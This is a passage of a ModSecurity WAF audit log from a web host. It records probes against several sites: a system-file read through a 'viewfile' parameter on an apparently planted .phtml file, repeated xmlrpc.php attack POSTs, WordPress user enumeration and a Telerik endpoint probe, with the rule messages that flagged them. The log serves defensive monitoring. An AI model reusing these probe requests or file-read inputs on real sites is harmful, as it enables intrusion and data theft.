.profile found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.profile.md5sums"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.profile.md5sums"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCsQ5VkCcfT-Z8NQYzFVQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117443623852 4318 (- - -) Stopwatch2: 1750117443623852 4318; combined=2207, p1=328, p2=1751, p3=34, p4=36, p5=57, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3288244-Z-- --6721e275-A-- [17/Jun/2025:05:14:39.127190 +0530] aFCsZlCTF37l_jAzt4oThAAAAAU 146.190.105.35 56986 127.0.0.1 7081 --6721e275-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=lpn072c85cetlbcjkg6f3mej4m; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f3d8a89aa5f95b2a17ae20f45576af%7C%7C1750290277%7C%7C1750286677%7C%7C54cdc97475cef3b6f9c72571f9b7eadf; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=9637afbe9769d687436ee9a2f23d84c9%7C%7C1750290277%7C%7C1750286677%7C%7Cb34faf270f7359a143b3c9aea1b7b705 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6721e275-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=704ta0m8nu06eu85pf31cp1ebs; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_777934355161e76517ff3ee366bb00%7C%7C1750290278%7C%7C1750286678%7C%7Ca881408c3d6d8d6c9e4f531247a3b5a2; expires=Wed, 18 Jun 2025 23:44:38 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=b42aba80f1a9df82a0ef275303ba872b%7C%7C1750290279%7C%7C1750286679%7C%7C3f25ffe4aa0a8799449ce3da3d4b805d; expires=Wed, 18 Jun 2025 23:44:39 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6721e275-E-- --6721e275-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCsZlCTF37l_jAzt4oThAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117478113165 1014111 (- - -) Stopwatch2: 1750117478113165 1014111; combined=2793, p1=355, p2=2053, p3=105, p4=39, p5=150, sr=83, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6721e275-Z-- --ce2ed779-A-- [17/Jun/2025:05:15:39.883614 +0530] aFCsouTJOk1gXj_qIh4YwwAAAAQ 146.190.105.35 38308 127.0.0.1 7081 --ce2ed779-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=hlhlkb1h6eue7d49ucitvtdorb; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d83132ed8397df74de47c3004615dc%7C%7C1750290338%7C%7C1750286738%7C%7C35fc1582d866bf57210bcc7175cdc66b; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=931557c924fe24e03b147dc8fb976b92%7C%7C1750290338%7C%7C1750286738%7C%7Cd879fb3837dfd3f1fafd33330c0de66c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ce2ed779-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=5rvgc9qehi4b9mslfsu2oh8m2t; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_aa66fef824f0e75b75b3490c1c36ab%7C%7C1750290339%7C%7C1750286739%7C%7Cc9eb9cf31ace710bffc87d3fb7ff2485; expires=Wed, 18 Jun 2025 23:45:39 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6ce799ecc954d4c204ad50fab1fca90f%7C%7C1750290339%7C%7C1750286739%7C%7C6faa61472a6b4575d41bb3a273831ef1; expires=Wed, 18 Jun 2025 23:45:39 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ce2ed779-E-- --ce2ed779-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCsouTJOk1gXj_qIh4YwwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117538829973 1053726 (- - -) Stopwatch2: 1750117538829973 1053726; combined=3158, p1=400, p2=2353, p3=102, p4=42, p5=163, sr=103, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ce2ed779-Z-- --85a61c3e-A-- [17/Jun/2025:05:16:01.426338 +0530] aFCsuOTJOk1gXj_qIh4YygAAAAQ 198.44.191.200 32898 127.0.0.1 7081 --85a61c3e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tryons.ai X-Real-IP: 198.44.191.200 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --85a61c3e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --85a61c3e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tryons.ai|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tryons.ai|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tryons.ai"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFCsuOTJOk1gXj_qIh4YygAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117560429704 996727 (- - -) Stopwatch2: 1750117560429704 996727; combined=2109, p1=364, p2=1642, p3=0, p4=0, p5=103, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --85a61c3e-Z-- --6cc4dd4b-A-- [17/Jun/2025:05:16:40.071368 +0530] aFCs34oVQnPDyHnl9oPUtgAAAAY 146.190.105.35 46082 127.0.0.1 7081 --6cc4dd4b-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 Cookie: PHPSESSID=gqajkv7arjbl0pmh2ejr761lr9; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3e90bd6018f7576350c13e2834dbc6%7C%7C1750290398%7C%7C1750286798%7C%7C8b915e0183d5edd5f25cf759f274845f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=3e649ba88ef7a72e62dff2de3597a3cc%7C%7C1750290398%7C%7C1750286798%7C%7C1a7efd9f76506f6748a61033f06c643c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6cc4dd4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=pb8leg4u5jt0d97c0t0go4pef9; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_007caa9a52b3336fa8aec49d1e9f85%7C%7C1750290399%7C%7C1750286799%7C%7C2821b68bdb959c18904c9d90f0109d4f; expires=Wed, 18 Jun 2025 23:46:39 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=dc752f8b69d5a219bfe2031deee071ca%7C%7C1750290400%7C%7C1750286800%7C%7C788e4ee17ef436efb3dc53a2e85c4663; expires=Wed, 18 Jun 2025 23:46:40 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6cc4dd4b-E-- --6cc4dd4b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCs34oVQnPDyHnl9oPUtgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117599018193 1053285 (- - -) Stopwatch2: 1750117599018193 1053285; combined=3844, p1=551, p2=2816, p3=111, p4=42, p5=202, sr=154, sw=122, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6cc4dd4b-Z-- --b8533b7a-A-- [17/Jun/2025:05:17:29.555109 +0530] aFCtEVJfblPUQiSn5r2StgAAAAA 172.68.234.186 53310 127.0.0.1 7080 --b8533b7a-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: www.superrefrigerations.com X-Real-IP: 172.68.234.186 X-Forwarded-For: 41.65.107.38 X-Accel-Internal: /internal-nginx-static-location Connection: close cf-ray: 950e314c8904e18d-MRS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 accept-encoding: gzip Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" X-Forwarded-Proto: http cdn-loop: cloudflare; loops=1 Accept: */* CF-Visitor: {"scheme":"http"} CF-IPCountry: EG CF-Connecting-IP: 41.65.107.38 --b8533b7a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 14:06:59 GMT ETag: "328-623a72f4250b7" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b8533b7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.superrefrigerations.com|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.superrefrigerations.com|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.superrefrigerations.com"] [uri "/Telerik.Web.UI.WebResource.axd"] [unique_id "aFCtEVJfblPUQiSn5r2StgAAAAA"] Stopwatch: 1750117649551517 3669 (- - -) Stopwatch2: 1750117649551517 3669; combined=2247, p1=351, p2=1834, p3=0, p4=0, p5=62, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8533b7a-Z-- --a5801912-A-- [17/Jun/2025:05:17:40.821093 +0530] aFCtG-TJOk1gXj_qIh4ZKgAAAAQ 146.190.105.35 44340 127.0.0.1 7081 --a5801912-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=cqpt6t371huthbrvhuiir3dle4; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d881c0ae17689b13be0de542f5d839%7C%7C1750290459%7C%7C1750286859%7C%7Cdccba3c2353c50c3aa3fbe006409e962; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=67d5d303582115dd4d5783304ade2f6b%7C%7C1750290459%7C%7C1750286859%7C%7C767cfe1d904f20b9fb74511044912723 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --a5801912-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=p5g5qv7dkhtui24ltm10684bpn; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b0c334f74d69fa781ff981c286a3e1%7C%7C1750290460%7C%7C1750286860%7C%7Cb0557e92af5faf0f5786b006b8ef16d5; expires=Wed, 18 Jun 2025 23:47:40 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=7159d44453029bb3d88f5ee1437d9016%7C%7C1750290460%7C%7C1750286860%7C%7C3e57c80af99cacd4c6f6cf48ef7223ca; expires=Wed, 18 Jun 2025 23:47:40 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a5801912-E-- --a5801912-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCtG-TJOk1gXj_qIh4ZKgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117659771933 1049239 (- - -) Stopwatch2: 1750117659771933 1049239; combined=4218, p1=561, p2=3252, p3=109, p4=39, p5=160, sr=123, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5801912-Z-- --79da4f3d-A-- [17/Jun/2025:05:18:41.094085 +0530] aFCtWIoVQnPDyHnl9oPVDQAAAAY 146.190.105.35 34786 127.0.0.1 7081 --79da4f3d-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=kgm7u4c0b5p56si1gik47fbfsl; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_f4a756e4371d6cbaffdd14749e16c9%7C%7C1750290519%7C%7C1750286919%7C%7C03a3a820713e97a33f77d8c0fb9645e9; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=4e119be8cbf2c786b28babf15f8a253c%7C%7C1750290519%7C%7C1750286919%7C%7C74419fad96cbf861f0c562abae721c94 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --79da4f3d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=n3u5cl1qia37hud3j7366oguut; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7ff4874efa07e620cb759b9171d0de%7C%7C1750290520%7C%7C1750286920%7C%7C89117bb5450091934ef58935fb2d8a60; expires=Wed, 18 Jun 2025 23:48:40 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=710435afc2498be32cbd5f343e627b5e%7C%7C1750290521%7C%7C1750286921%7C%7C988dfcdf6b4211451b203edc32da3760; expires=Wed, 18 Jun 2025 23:48:41 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --79da4f3d-E-- --79da4f3d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.190.105.35 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aFCtWIoVQnPDyHnl9oPVDQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117720018634 1075552 (- - -) Stopwatch2: 1750117720018634 1075552; combined=3355, p1=396, p2=2487, p3=109, p4=41, p5=203, sr=90, sw=119, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79da4f3d-Z-- --c07a072d-A-- [17/Jun/2025:05:19:28.720734 +0530] aFCth9yZ4SMykfn97vy4-gAAAAs 62.232.33.62 58470 127.0.0.1 7081 --c07a072d-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 62.232.33.62 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 362 sec-ch-ua-platform: "Linux" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/98.0.1108.62 sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99" content-type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 accept: */* origin: https://www.retaxis.com sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=1, i cookie: _fbp=fb.1.1750117767341.377093287952731360 --c07a072d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=9d2df1cd2b741cf8e0789746b9714d6a1750117768; expires=Tue, 17 Jun 2025 00:49:28 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=kv5eoji37btcfeobqs1ol35cap; expires=Sun, 14 Sep 2025 23:49:28 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c07a072d-E-- --c07a072d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCth9yZ4SMykfn97vy4-gAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCth9yZ4SMykfn97vy4-gAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750117767418234 1302660 (- - -) Stopwatch2: 1750117767418234 1302660; combined=2923, p1=408, p2=2180, p3=135, p4=43, p5=157, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c07a072d-Z-- --e6608404-A-- [17/Jun/2025:05:19:41.848303 +0530] aFCtlGj9J38fG6WAr4pZfQAAAAk 146.190.105.35 45430 127.0.0.1 7081 --e6608404-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 146.190.105.35 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 Cookie: PHPSESSID=mdd85cflf05qa3rsjfvekk7bnq; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d6e01a37c8c796ba53f833ea7d8504%7C%7C1750290580%7C%7C1750286980%7C%7Cc604c5e09cd52ca7e4f45b790f156465; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=e8f90ddd01411f406de0975484369d23%7C%7C1750290580%7C%7C1750286980%7C%7C8b16c7514dbba2b1db399f50ed7ed78e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --e6608404-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=3l9erpgn9up1qrtaerlp0sagmv; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_abb020a1a4193161a1216757860ab0%7C%7C1750290581%7C%7C1750286981%7C%7C509d02d75baa7f69760a6fa7bc22fde5; expires=Wed, 18 Jun 2025 23:49:41 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: 